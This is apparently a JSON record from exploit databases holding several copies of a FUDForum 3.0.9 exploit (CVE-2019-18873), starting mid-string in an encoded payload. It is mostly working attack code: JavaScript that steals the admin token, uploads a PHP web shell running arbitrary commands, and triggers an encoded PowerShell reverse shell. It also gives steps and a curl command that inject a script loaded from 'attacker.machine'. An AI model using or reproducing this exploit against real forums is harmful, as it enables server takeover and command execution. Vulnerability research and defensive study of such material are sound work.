41%43%51%41%59%67%42%35%41%48%51%41%5a%51%42%7a%41%43%41%41%50%51%41%67%41%44%41%41%4c%67%41%75%41%44%59%41%4e%51%41%31%41%44%4d%41%4e%51%42%38%41%43%55%41%65%77%41%77%41%48%30%41%4f%77%42%33%41%47%67%41%61%51%42%73%41%47%55%41%4b%41%41%6f%41%43%51%41%61%51%41%67%41%44%30%41%49%41%41%6b%41%48%4d%41%64%41%42%79%41%47%55%41%59%51%42%74%41%43%34%41%55%67%42%6c%41%47%45%41%5a%41%41%6f%41%43%51%41%59%67%42%35%41%48%51%41%5a%51%42%7a%41%43%77%41%49%41%41%77%41%43%77%41%49%41%41%6b%41%47%49%41%65%51%42%30%41%47%55%41%63%77%41%75%41%45%77%41%5a%51%42%75
%41%47%63%41%64%41%42%6f%41%43%6b%41%4b%51%41%67%41%43%30%41%62%67%42%6c%41%43%41%41%4d%41%41%70%41%48%73%41%4f%77%41%6b%41%47%51%41%59%51%42%30%41%47%45%41%49%41%41%39%41%43%41%41%4b%41%42%4f%41%47%55%41%64%77%41%74%41%45%38%41%59%67%42%71%41%47%55%41%59%77%42%30%41%43%41%41%4c%51%42%55%41%48%6b%41%63%41%42%6c%41%45%34%41%59%51%42%74%41%47%55%41%49%41%42%54%41%48%6b%41%63%77%42%30%41%47%55%41%62%51%41%75%41%46%51%41%5a%51%42%34%41%48%51%41%4c%67%42%42%41%46%4d%41%51%77%42%4a%41%45%6b%41%52%51%42%75%41%47%4d%41%62%77%42%6b%41%47%6b%41%62%67%42%6e%41%43%6b%41%4c%67%42%48%41%47%55%41%64%41%42%54%41%48%51%41%63%67%42%70%41%47%34%41%5a%77%41%6f%41%43%51%41%59%67%42%35%41%48%51%41%5a%51%42%7a%41%43%77%41%4d%41%41%73%41%43%41%41%4a%41%42%70%41%43%6b%41%4f%77%41%6b%41%48%4d%41%5a%51%42%75%41%47%51%41%59%67%42%68%41%47%4d%41%61%77%41%67%41%44%30%41%49%41%41%6f%41%47%6b%41%5a%51%42%34%41%43%41%41%4a%41%42%6b%41%47%45%41%64%41%42%68%41%43%41%41%4d%67%41%2b%41%43%59%41%4d%51%41%67%41%48%77%41%49%41%42%50%41%48%55%41%64%41%41%74%41%46%4d%41%64%41%42%79%41%47%6b%41%62%67%42%6e%41%43%41%41%4b%51%41%37%41%43%51%41%63%77%42%6c%41%47%34%41%5a%41%42%69%41%47%45%41%59%77%42%72%41%44%49%41%49%41%41%67%41%44%30%41%49%41%41%6b%41%48%4d%41%5a%51%42%75%41%47%51%41%59%67%42%68%41%47%4d%41%61%77%41%67%41%43%73%41%49%41%41%6e%41%46%41%41%55%77%41%67%41%43%63%41%49%41%41%72%41%43%41%41%4b%41%42%77%41%48%63%41%5a%41%41%70%41%43%34%41%55%41%42%68%41%48%51%41%61%41%41%67%41%43%73%41%49%41%41%6e%41%44%34%41%49%41%41%6e%41%44%73%41%4a%41%42%7a%41%47%55%41%62%67%42%6b%41%47%49%41%65%51%42%30%41%47%55%41%49%41%41%39%41%43%41%41%4b%41%42%62%41%48%51%41%5a%51%42%34%41%48%51%41%4c%67%42%6c%41%47%34%41%59%77%42%76%41%47%51%41%61%51%42%75%41%47%63%41%58%51%41%36%41%44%6f%41%51%51%42%54%41%45%4d%41%53%51%42%4a%41%43%6b%41%4c%67%42%48%41%47%55%41%64%41%42%43%41%48%6b%41%64%41%42%6c%41%48%4d%41%4b%41%41%6b%41%48%4d%41%5a%51%42%75%41%47%51%41%59%67%42%68%41%47%4d%41%61%77%41%79%41%43%6b%41%4f%77%41%6b%41%48%4
d%41%64%41%42%79%41%47%55%41%59%51%42%74%41%43%34%41%56%77%42%79%41%47%6b%41%64%41%42%6c%41%43%67%41%4a%41%42%7a%41%47%55%41%62%67%42%6b%41%47%49%41%65%51%42%30%41%47%55%41%4c%41%41%77%41%43%77%41%4a%41%42%7a%41%47%55%41%62%67%42%6b%41%47%49%41%65%51%42%30%41%47%55%41%4c%67%42%4d%41%47%55%41%62%67%42%6e%41%48%51%41%61%41%41%70%41%44%73%41%4a%41%42%7a%41%48%51%41%63%67%42%6c%41%47%45%41%62%51%41%75%41%45%59%41%62%41%42%31%41%48%4d%41%61%41%41%6f%41%43%6b%41%66%51%41%37%41%43%51%41%59%77%42%73%41%47%6b%41%5a%51%42%75%41%48%51%41%4c%67%42%44%41%47%77%41%62%77%42%7a%41%47%55%41%4b%41%41%70%41%41%6f%41\";\r\n \txhr = new XMLHttpRequest();\r\n\txhr.open(\"GET\", url, true);\r\n\txhr.send(null);\r\n\r\n}\r\n\r\nfunction submitFormWithTokenJS(token) {\r\n var xhr = new XMLHttpRequest();\r\n xhr.open(\"POST\", '/fudforum/adm/admbrowse.php', true);\r\n\r\n // Send the proper header information along with the request\r\n xhr.setRequestHeader(\"Content-Type\", \"multipart/form-data, boundary=-----------------------------9703186584101745941654835853\");\r\n\r\n var currentdir = \"C:/xampp/htdocs/fudforum\"; // webroot - forum directory\r\n var fileName = \"liquidsky.php\";\r\n var url = \"/fudforum/adm/admbrowse.php\";\r\n var ctype = \"application/x-php\";\r\n var fileData = \"<?php if(isset($_REQUEST['cmd'])){ echo '<pre>'; $cmd = ($_REQUEST['cmd']); system($cmd); echo '</pre>'; die; }?>\";\r\n var boundary = \"-----------------------------9703186584101745941654835853\";\r\n var fileSize = fileData.length;\r\n\r\n var body = \"--\" + boundary + \"\\r\\n\";\r\n body += 'Content-Disposition: form-data; name=\"cur\"\\r\\n\\r\\n';\r\n body += currentdir + \"\\r\\n\";\r\n body += \"--\" + boundary + \"\\r\\n\";\r\n body += 'Content-Disposition: form-data; name=\"SQ\"\\r\\n\\r\\n';\r\n body += token + \"\\r\\n\";\r\n body += \"--\" + boundary + \"\\r\\n\";\r\n body += 'Content-Disposition: form-data; name=\"fname\"; filename=\"' + fileName + '\"\\r\\n';\r\n body += \"Content-Type: 
\" + ctype + \"\\r\\n\\r\\n\";\r\n body += fileData + \"\\r\\n\\r\\n\";\r\n body += \"--\" + boundary + \"\\r\\n\";\r\n body += 'Content-Disposition: form-data; name=\"tmp_f_val\"\\r\\n\\r\\n';\r\n body += \"1\" + \"\\r\\n\";\r\n body += \"--\" + boundary + \"\\r\\n\";\r\n body += 'Content-Disposition: form-data; name=\"d_name\"\\r\\n\\r\\n';\r\n body += fileName + \"\\r\\n\";\r\n body += \"--\" + boundary + \"\\r\\n\";\r\n body += 'Content-Disposition: form-data; name=\"file_upload\"\\r\\n\\r\\n';\r\n body += \"Upload File\" + '\\r\\n';\r\n body += \"--\" + boundary + \"--\";\r\n\r\n xhr.send(body);\r\n}\r\n\r\n//Grab SQ token\r\nvar req = new XMLHttpRequest();\r\n\r\nreq.onreadystatechange=function()\r\n{\r\n if (req.readyState == 4 && req.status == 200) {\r\n var htmlPage = req.responseXML; /* fetch html */\r\n var SQ = htmlPage.getElementsByTagName(\"input\")[0]\r\n submitFormWithTokenJS(SQ.value);\r\n }\r\n}\r\n\r\nreq.open(\"GET\", \"/fudforum/adm/admuser.php\", true);\r\nreq.responseType = \"document\";\r\nreq.send();\r\n\r\npatience();", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/47650"}], "exploitpack": [{"lastseen": "2020-04-01T20:39:57", "description": "\nFUDForum 3.0.9 - Remote Code Execution", "edition": 1, "published": "2019-11-13T00:00:00", "title": "FUDForum 3.0.9 - Remote Code Execution", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-18873"], "modified": "2019-11-13T00:00:00", "id": "EXPLOITPACK:415E49FD56AE97FF0EDBFA10ECE120C7", "href": "", "sourceData": "# Exploit Title : FUDForum 3.0.9 - Remote Code Execution\n# Date: 2019-10-26\n# Exploit Author: liquidsky (JMcPeters)\n# Vulnerable Software: FUDForum 3.0.9\n# Vendor Homepage: https://sourceforge.net/projects/fudforum/\n# Version: 3.0.9\n# Software Link: https://sourceforge.net/projects/fudforum/files/FUDforum_3.0.9.zip/download\n# Tested On: Windows / mysql / apache\n# Author Site: 
https://github.com/fuzzlove/FUDforum-XSS-RCE\n# Demo: https://youtu.be/0gsJQ82TXw4 | https://youtu.be/fR8hVK1paks\n# CVE: CVE-2019-18873\n\n\n// Greetz : wetw0rk, Fr13ndz, offsec =)\n//\n// Description: Multiple Stored XSS vulnerabilities have been found in FUDforum 3.0.9 that may result in remote code execution.\n// The areas impacted are the admin panel and the forum.\n//\n// XSS via username in Forum:\n// 1. Register an account and log in to the forum.\n// 2. Go to the user control panel. -> Account Settings -> change login\n// 3. Insert javascript payload <script/src=\"http://attacker.machine/fud.js\"></script>\n// 4. When the admin visits the user information the payload will fire, uploading a php shell on the remote system.\n//\n// XSS via user-agent in Admin Panel:\n// 1. Register an account and log in to the forum. If you have an IP already associated with a registered user this is not required. This step is so when you run the XSS payload from your attacker machine it gets logged under the user activity.\n// 2. Send the XSS payload below (from an IP associated with an account) / host the script:\n// 3. curl -A '<script src=\"http://attacker.machine/fud.js\"></script>' http://target.machine/fudforum/index.php\n// 4. 
When the admin visits the user information from the admin controls / User Manager the payload will fire under \"Recent sessions\", uploading a php shell on the remote system.\n//\n\nfunction patience()\n{\n\tvar u=setTimeout(\"grabShell()\",5000);\n}\n\n// This function is to call the reverse shell php script (liquidsky.php).\n// currently using a powershell payload that will need to be modified.\nfunction grabShell()\n{\n\tvar url =\"/fudforum/liquidsky.php?cmd=%70%6f%77%65%72%73%68%65%6c%6c%20%2d%45%6e%63%6f%64%65%64%43%6f%6d%6d%61%6e%64%20%4a%41%42%6a%41%47%77%41%61%51%42%6c%41%47%34%41%64%41%41%67%41%44%30%41%49%41%42%4f%41%47%55%41%64%77%41%74%41%45%38%41%59%67%42%71%41%47%55%41%59%77%42%30%41%43%41%41%55%77%42%35%41%48%4d%41%64%41%42%6c%41%47%30%41%4c%67%42%4f%41%47%55%41%64%41%41%75%41%46%4d%41%62%77%42%6a%41%47%73%41%5a%51%42%30%41%48%4d%41%4c%67%42%55%41%45%4d%41%55%41%42%44%41%47%77%41%61%51%42%6c%41%47%34%41%64%41%41%6f%41%43%63%41%4d%51%41%35%41%44%49%41%4c%67%41%78%41%44%59%41%4f%41%41%75%41%44%49%41%4f%41%41%75%41%44%45%41%4e%51%41%79%41%43%63%41%4c%41%41%30%41%44%51%41%4d%77%41%70%41%44%73%41%4a%41%42%7a%41%48%51%41%63%67%42%6c%41%47%45%41%62%51%41%67%41%44%30%41%49%41%41%6b%41%47%4d%41%62%41%42%70%41%47%55%41%62%67%42%30%41%43%34%41%52%77%42%6c%41%48%51%41%55%77%42%30%41%48%49%41%5a%51%42%68%41%47%30%41%4b%41%41%70%41%44%73%41%57%77%42%69%41%48%6b%41%64%41%42%6c%41%46%73%41%58%51%42%64%41%43%51%41%59%67%42%35%41%48%51%41%5a%51%42%7a%41%43%41%41%50%51%41%67%41%44%41%41%4c%67%41%75%41%44%59%41%4e%51%41%31%41%44%4d%41%4e%51%42%38%41%43%55%41%65%77%41%77%41%48%30%41%4f%77%42%33%41%47%67%41%61%51%42%73%41%47%55%41%4b%41%41%6f%41%43%51%41%61%51%41%67%41%44%30%41%49%41%41%6b%41%48%4d%41%64%41%42%79%41%47%55%41%59%51%42%74%41%43%34%41%55%67%42%6c%41%47%45%41%5a%41%41%6f%41%43%51%41%59%67%42%35%41%48%51%41%5a%51%42%7a%41%43%77%41%49%41%41%77%41%43%77%41%49%41%41%6b%41%47%49%41%65%51%42%30%41%47%55%41%63%77%41%75%41%45%77%41%5a%51%42%75%41%47%63%41%64%41%42%6f
%41%43%6b%41%4b%51%41%67%41%43%30%41%62%67%42%6c%41%43%41%41%4d%41%41%70%41%48%73%41%4f%77%41%6b%41%47%51%41%59%51%42%30%41%47%45%41%49%41%41%39%41%43%41%41%4b%41%42%4f%41%47%55%41%64%77%41%74%41%45%38%41%59%67%42%71%41%47%55%41%59%77%42%30%41%43%41%41%4c%51%42%55%41%48%6b%41%63%41%42%6c%41%45%34%41%59%51%42%74%41%47%55%41%49%41%42%54%41%48%6b%41%63%77%42%30%41%47%55%41%62%51%41%75%41%46%51%41%5a%51%42%34%41%48%51%41%4c%67%42%42%41%46%4d%41%51%77%42%4a%41%45%6b%41%52%51%42%75%41%47%4d%41%62%77%42%6b%41%47%6b%41%62%67%42%6e%41%43%6b%41%4c%67%42%48%41%47%55%41%64%41%42%54%41%48%51%41%63%67%42%70%41%47%34%41%5a%77%41%6f%41%43%51%41%59%67%42%35%41%48%51%41%5a%51%42%7a%41%43%77%41%4d%41%41%73%41%43%41%41%4a%41%42%70%41%43%6b%41%4f%77%41%6b%41%48%4d%41%5a%51%42%75%41%47%51%41%59%67%42%68%41%47%4d%41%61%77%41%67%41%44%30%41%49%41%41%6f%41%47%6b%41%5a%51%42%34%41%43%41%41%4a%41%42%6b%41%47%45%41%64%41%42%68%41%43%41%41%4d%67%41%2b%41%43%59%41%4d%51%41%67%41%48%77%41%49%41%42%50%41%48%55%41%64%41%41%74%41%46%4d%41%64%41%42%79%41%47%6b%41%62%67%42%6e%41%43%41%41%4b%51%41%37%41%43%51%41%63%77%42%6c%41%47%34%41%5a%41%42%69%41%47%45%41%59%77%42%72%41%44%49%41%49%41%41%67%41%44%30%41%49%41%41%6b%41%48%4d%41%5a%51%42%75%41%47%51%41%59%67%42%68%41%47%4d%41%61%77%41%67%41%43%73%41%49%41%41%6e%41%46%41%41%55%77%41%67%41%43%63%41%49%41%41%72%41%43%41%41%4b%41%42%77%41%48%63%41%5a%41%41%70%41%43%34%41%55%41%42%68%41%48%51%41%61%41%41%67%41%43%73%41%49%41%41%6e%41%44%34%41%49%41%41%6e%41%44%73%41%4a%41%42%7a%41%47%55%41%62%67%42%6b%41%47%49%41%65%51%42%30%41%47%55%41%49%41%41%39%41%43%41%41%4b%41%42%62%41%48%51%41%5a%51%42%34%41%48%51%41%4c%67%42%6c%41%47%34%41%59%77%42%76%41%47%51%41%61%51%42%75%41%47%63%41%58%51%41%36%41%44%6f%41%51%51%42%54%41%45%4d%41%53%51%42%4a%41%43%6b%41%4c%67%42%48%41%47%55%41%64%41%42%43%41%48%6b%41%64%41%42%6c%41%48%4d%41%4b%41%41%6b%41%48%4d%41%5a%51%42%75%41%47%51%41%59%67%42%68%41%47%4d%41%61%77%41%79%41%43%6b%41%4f%77%41%6b%41%48%4d%41%64%41%42%79%41%47%5
5%41%59%51%42%74%41%43%34%41%56%77%42%79%41%47%6b%41%64%41%42%6c%41%43%67%41%4a%41%42%7a%41%47%55%41%62%67%42%6b%41%47%49%41%65%51%42%30%41%47%55%41%4c%41%41%77%41%43%77%41%4a%41%42%7a%41%47%55%41%62%67%42%6b%41%47%49%41%65%51%42%30%41%47%55%41%4c%67%42%4d%41%47%55%41%62%67%42%6e%41%48%51%41%61%41%41%70%41%44%73%41%4a%41%42%7a%41%48%51%41%63%67%42%6c%41%47%45%41%62%51%41%75%41%45%59%41%62%41%42%31%41%48%4d%41%61%41%41%6f%41%43%6b%41%66%51%41%37%41%43%51%41%59%77%42%73%41%47%6b%41%5a%51%42%75%41%48%51%41%4c%67%42%44%41%47%77%41%62%77%42%7a%41%47%55%41%4b%41%41%70%41%41%6f%41\";\n \txhr = new XMLHttpRequest();\n\txhr.open(\"GET\", url, true);\n\txhr.send(null);\n\n}\n\nfunction submitFormWithTokenJS(token) {\n var xhr = new XMLHttpRequest();\n xhr.open(\"POST\", '/fudforum/adm/admbrowse.php', true);\n\n // Send the proper header information along with the request\n xhr.setRequestHeader(\"Content-Type\", \"multipart/form-data, boundary=-----------------------------9703186584101745941654835853\");\n\n var currentdir = \"C:/xampp/htdocs/fudforum\"; // webroot - forum directory\n var fileName = \"liquidsky.php\";\n var url = \"/fudforum/adm/admbrowse.php\";\n var ctype = \"application/x-php\";\n var fileData = \"<?php if(isset($_REQUEST['cmd'])){ echo '<pre>'; $cmd = ($_REQUEST['cmd']); system($cmd); echo '</pre>'; die; }?>\";\n var boundary = \"-----------------------------9703186584101745941654835853\";\n var fileSize = fileData.length;\n\n var body = \"--\" + boundary + \"\\r\\n\";\n body += 'Content-Disposition: form-data; name=\"cur\"\\r\\n\\r\\n';\n body += currentdir + \"\\r\\n\";\n body += \"--\" + boundary + \"\\r\\n\";\n body += 'Content-Disposition: form-data; name=\"SQ\"\\r\\n\\r\\n';\n body += token + \"\\r\\n\";\n body += \"--\" + boundary + \"\\r\\n\";\n body += 'Content-Disposition: form-data; name=\"fname\"; filename=\"' + fileName + '\"\\r\\n';\n body += \"Content-Type: \" + ctype + \"\\r\\n\\r\\n\";\n body += fileData + \"\\r\\n\\r\\n\";\n body += 
\"--\" + boundary + \"\\r\\n\";\n body += 'Content-Disposition: form-data; name=\"tmp_f_val\"\\r\\n\\r\\n';\n body += \"1\" + \"\\r\\n\";\n body += \"--\" + boundary + \"\\r\\n\";\n body += 'Content-Disposition: form-data; name=\"d_name\"\\r\\n\\r\\n';\n body += fileName + \"\\r\\n\";\n body += \"--\" + boundary + \"\\r\\n\";\n body += 'Content-Disposition: form-data; name=\"file_upload\"\\r\\n\\r\\n';\n body += \"Upload File\" + '\\r\\n';\n body += \"--\" + boundary + \"--\";\n\n xhr.send(body);\n}\n\n//Grab SQ token\nvar req = new XMLHttpRequest();\n\nreq.onreadystatechange=function()\n{\n if (req.readyState == 4 && req.status == 200) {\n var htmlPage = req.responseXML; /* fetch html */\n var SQ = htmlPage.getElementsByTagName(\"input\")[0]\n submitFormWithTokenJS(SQ.value);\n }\n}\n\nreq.open(\"GET\", \"/fudforum/adm/admuser.php\", true);\nreq.responseType = \"document\";\nreq.send();\n\npatience();", "cvss": {"score": 8.5, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2019-11-14T02:21:28", "description": "", "published": "2019-11-12T00:00:00", "type": "packetstorm", "title": "FUDForum 3.0.9 Code Execution / Cross Site Scripting", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-18873", "CVE-2019-18839"], "modified": "2019-11-12T00:00:00", "id": "PACKETSTORM:155261", "href": "https://packetstormsecurity.com/files/155261/FUDForum-3.0.9-Code-Execution-Cross-Site-Scripting.html", "sourceData": "`// Exploit Title : FUDForum 3.0.9 - Stored XSS / Remote Code Execution \n// Date : 10/26/19 \n// Exploit Author : liquidsky (JMcPeters) \n// Vulnerable Software : FUDForum 3.0.9 \n// Vendor Homepage : https://sourceforge.net/projects/fudforum/ \n// Version : 3.0.9 \n// Software Link : https://sourceforge.net/projects/fudforum/files/FUDforum_3.0.9.zip/download \n// Tested On : Windows / mysql / apache \n// Author Site : https://github.com/fuzzlove/FUDforum-XSS-RCE \n// Demo : https://youtu.be/0gsJQ82TXw4 | https://youtu.be/fR8hVK1paks \n// CVE : 
CVE-2019-18839, CVE-2019-18873 \n// \n// Greetz : wetw0rk, Fr13ndz, offsec =) \n// \n// Description: Multiple Stored XSS vulnerabilities have been found in FUDforum 3.0.9 that may result in remote code execution. \n// The areas impacted are the admin panel and the forum. \n// \n// XSS via username in Forum: \n// 1. Register an account and log in to the forum. \n// 2. Go to the user control panel. -> Account Settings -> change login \n// 3. Insert javascript payload <script/src=\"http://attacker.machine/fud.js\"></script> \n// 4. When the admin visits the user information the payload will fire, uploading a php shell on the remote system. \n// \n// XSS via user-agent in Admin Panel: \n// 1. Register an account and log in to the forum. If you have an IP already associated with a registered user this is not required. This step is so when you run the XSS payload from your attacker machine it gets logged under the user activity. \n// 2. Send the XSS payload below (from an IP associated with an account) / host the script: \n// 3. curl -A '<script src=\"http://attacker.machine/fud.js\"></script>' http://target.machine/fudforum/index.php \n// 4. When the admin visits the user information from the admin controls / User Manager the payload will fire under \"Recent sessions\", uploading a php shell on the remote system. \n// \n \nfunction patience() \n{ \nvar u=setTimeout(\"grabShell()\",5000); \n} \n \n// This function is to call the reverse shell php script (liquidsky.php). \n// currently using a powershell payload that will need to be modified. 
\nfunction grabShell() \n{ \nvar url =\"/fudforum/liquidsky.php?cmd=%70%6f%77%65%72%73%68%65%6c%6c%20%2d%45%6e%63%6f%64%65%64%43%6f%6d%6d%61%6e%64%20%4a%41%42%6a%41%47%77%41%61%51%42%6c%41%47%34%41%64%41%41%67%41%44%30%41%49%41%42%4f%41%47%55%41%64%77%41%74%41%45%38%41%59%67%42%71%41%47%55%41%59%77%42%30%41%43%41%41%55%77%42%35%41%48%4d%41%64%41%42%6c%41%47%30%41%4c%67%42%4f%41%47%55%41%64%41%41%75%41%46%4d%41%62%77%42%6a%41%47%73%41%5a%51%42%30%41%48%4d%41%4c%67%42%55%41%45%4d%41%55%41%42%44%41%47%77%41%61%51%42%6c%41%47%34%41%64%41%41%6f%41%43%63%41%4d%51%41%35%41%44%49%41%4c%67%41%78%41%44%59%41%4f%41%41%75%41%44%49%41%4f%41%41%75%41%44%45%41%4e%51%41%79%41%43%63%41%4c%41%41%30%41%44%51%41%4d%77%41%70%41%44%73%41%4a%41%42%7a%41%48%51%41%63%67%42%6c%41%47%45%41%62%51%41%67%41%44%30%41%49%41%41%6b%41%47%4d%41%62%41%42%70%41%47%55%41%62%67%42%30%41%43%34%41%52%77%42%6c%41%48%51%41%55%77%42%30%41%48%49%41%5a%51%42%68%41%47%30%41%4b%41%41%70%41%44%73%41%57%77%42%69%41%48%6b%41%64%41%42%6c%41%46%73%41%58%51%42%64%41%43%51%41%59%67%42%35%41%48%51%41%5a%51%42%7a%41%43%41%41%50%51%41%67%41%44%41%41%4c%67%41%75%41%44%59%41%4e%51%41%31%41%44%4d%41%4e%51%42%38%41%43%55%41%65%77%41%77%41%48%30%41%4f%77%42%33%41%47%67%41%61%51%42%73%41%47%55%41%4b%41%41%6f%41%43%51%41%61%51%41%67%41%44%30%41%49%41%41%6b%41%48%4d%41%64%41%42%79%41%47%55%41%59%51%42%74%41%43%34%41%55%67%42%6c%41%47%45%41%5a%41%41%6f%41%43%51%41%59%67%42%35%41%48%51%41%5a%51%42%7a%41%43%77%41%49%41%41%77%41%43%77%41%49%41%41%6b%41%47%49%41%65%51%42%30%41%47%55%41%63%77%41%75%41%45%77%41%5a%51%42%75%41%47%63%41%64%41%42%6f%41%43%6b%41%4b%51%41%67%41%43%30%41%62%67%42%6c%41%43%41%41%4d%41%41%70%41%48%73%41%4f%77%41%6b%41%47%51%41%59%51%42%30%41%47%45%41%49%41%41%39%41%43%41%41%4b%41%42%4f%41%47%55%41%64%77%41%74%41%45%38%41%59%67%42%71%41%47%55%41%59%77%42%30%41%43%41%41%4c%51%42%55%41%48%6b%41%63%41%42%6c%41%45%34%41%59%51%42%74%41%47%55%41%49%41%42%54%41%48%6b%41%63%77%42%30%41%47%55%41%62%51%41%75%41%46%51%41%5a
%51%42%34%41%48%51%41%4c%67%42%42%41%46%4d%41%51%77%42%4a%41%45%6b%41%52%51%42%75%41%47%4d%41%62%77%42%6b%41%47%6b%41%62%67%42%6e%41%43%6b%41%4c%67%42%48%41%47%55%41%64%41%42%54%41%48%51%41%63%67%42%70%41%47%34%41%5a%77%41%6f%41%43%51%41%59%67%42%35%41%48%51%41%5a%51%42%7a%41%43%77%41%4d%41%41%73%41%43%41%41%4a%41%42%70%41%43%6b%41%4f%77%41%6b%41%48%4d%41%5a%51%42%75%41%47%51%41%59%67%42%68%41%47%4d%41%61%77%41%67%41%44%30%41%49%41%41%6f%41%47%6b%41%5a%51%42%34%41%43%41%41%4a%41%42%6b%41%47%45%41%64%41%42%68%41%43%41%41%4d%67%41%2b%41%43%59%41%4d%51%41%67%41%48%77%41%49%41%42%50%41%48%55%41%64%41%41%74%41%46%4d%41%64%41%42%79%41%47%6b%41%62%67%42%6e%41%43%41%41%4b%51%41%37%41%43%51%41%63%77%42%6c%41%47%34%41%5a%41%42%69%41%47%45%41%59%77%42%72%41%44%49%41%49%41%41%67%41%44%30%41%49%41%41%6b%41%48%4d%41%5a%51%42%75%41%47%51%41%59%67%42%68%41%47%4d%41%61%77%41%67%41%43%73%41%49%41%41%6e%41%46%41%41%55%77%41%67%41%43%63%41%49%41%41%72%41%43%41%41%4b%41%42%77%41%48%63%41%5a%41%41%70%41%43%34%41%55%41%42%68%41%48%51%41%61%41%41%67%41%43%73%41%49%41%41%6e%41%44%34%41%49%41%41%6e%41%44%73%41%4a%41%42%7a%41%47%55%41%62%67%42%6b%41%47%49%41%65%51%42%30%41%47%55%41%49%41%41%39%41%43%41%41%4b%41%42%62%41%48%51%41%5a%51%42%34%41%48%51%41%4c%67%42%6c%41%47%34%41%59%77%42%76%41%47%51%41%61%51%42%75%41%47%63%41%58%51%41%36%41%44%6f%41%51%51%42%54%41%45%4d%41%53%51%42%4a%41%43%6b%41%4c%67%42%48%41%47%55%41%64%41%42%43%41%48%6b%41%64%41%42%6c%41%48%4d%41%4b%41%41%6b%41%48%4d%41%5a%51%42%75%41%47%51%41%59%67%42%68%41%47%4d%41%61%77%41%79%41%43%6b%41%4f%77%41%6b%41%48%4d%41%64%41%42%79%41%47%55%41%59%51%42%74%41%43%34%41%56%77%42%79%41%47%6b%41%64%41%42%6c%41%43%67%41%4a%41%42%7a%41%47%55%41%62%67%42%6b%41%47%49%41%65%51%42%30%41%47%55%41%4c%41%41%77%41%43%77%41%4a%41%42%7a%41%47%55%41%62%67%42%6b%41%47%49%41%65%51%42%30%41%47%55%41%4c%67%42%4d%41%47%55%41%62%67%42%6e%41%48%51%41%61%41%41%70%41%44%73%41%4a%41%42%7a%41%48%51%41%63%67%42%6c%41%47%45%41%62%51%41%75%41%45%59%41%62%41%42%3
1%41%48%4d%41%61%41%41%6f%41%43%6b%41%66%51%41%37%41%43%51%41%59%77%42%73%41%47%6b%41%5a%51%42%75%41%48%51%41%4c%67%42%44%41%47%77%41%62%77%42%7a%41%47%55%41%4b%41%41%70%41%41%6f%41\"; \nxhr = new XMLHttpRequest(); \nxhr.open(\"GET\", url, true); \nxhr.send(null); \n \n} \n \nfunction submitFormWithTokenJS(token) { \nvar xhr = new XMLHttpRequest(); \nxhr.open(\"POST\", '/fudforum/adm/admbrowse.php', true); \n \n// Send the proper header information along with the request \nxhr.setRequestHeader(\"Content-Type\", \"multipart/form-data, boundary=-----------------------------9703186584101745941654835853\"); \n \nvar currentdir = \"C:/xampp/htdocs/fudforum\"; // webroot - forum directory \nvar fileName = \"liquidsky.php\"; \nvar url = \"/fudforum/adm/admbrowse.php\"; \nvar ctype = \"application/x-php\"; \nvar fileData = \"<?php if(isset($_REQUEST['cmd'])){ echo '<pre>'; $cmd = ($_REQUEST['cmd']); system($cmd); echo '</pre>'; die; }?>\"; \nvar boundary = \"-----------------------------9703186584101745941654835853\"; \nvar fileSize = fileData.length; \n \nvar body = \"--\" + boundary + \"\\r\\n\"; \nbody += 'Content-Disposition: form-data; name=\"cur\"\\r\\n\\r\\n'; \nbody += currentdir + \"\\r\\n\"; \nbody += \"--\" + boundary + \"\\r\\n\"; \nbody += 'Content-Disposition: form-data; name=\"SQ\"\\r\\n\\r\\n'; \nbody += token + \"\\r\\n\"; \nbody += \"--\" + boundary + \"\\r\\n\"; \nbody += 'Content-Disposition: form-data; name=\"fname\"; filename=\"' + fileName + '\"\\r\\n'; \nbody += \"Content-Type: \" + ctype + \"\\r\\n\\r\\n\"; \nbody += fileData + \"\\r\\n\\r\\n\"; \nbody += \"--\" + boundary + \"\\r\\n\"; \nbody += 'Content-Disposition: form-data; name=\"tmp_f_val\"\\r\\n\\r\\n'; \nbody += \"1\" + \"\\r\\n\"; \nbody += \"--\" + boundary + \"\\r\\n\"; \nbody += 'Content-Disposition: form-data; name=\"d_name\"\\r\\n\\r\\n'; \nbody += fileName + \"\\r\\n\"; \nbody += \"--\" + boundary + \"\\r\\n\"; \nbody += 'Content-Disposition: form-data; 
name=\"file_upload\"\\r\\n\\r\\n'; \nbody += \"Upload File\" + '\\r\\n'; \nbody += \"--\" + boundary + \"--\"; \n \nxhr.send(body); \n} \n \n//Grab SQ token \nvar req = new XMLHttpRequest(); \n \nreq.onreadystatechange=function() \n{ \nif (req.readyState == 4 && req.status == 200) { \nvar htmlPage = req.responseXML; /* fetch html */ \nvar SQ = htmlPage.getElementsByTagName(\"input\")[0] \nsubmitFormWithTokenJS(SQ.value); \n} \n} \n \nreq.open(\"GET\", \"/fudforum/adm/admuser.php\", true); \nreq.responseType = \"document\"; \nreq.send(); \n \npatience(); \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/155261/fudforum309-xssexec.txt"}]}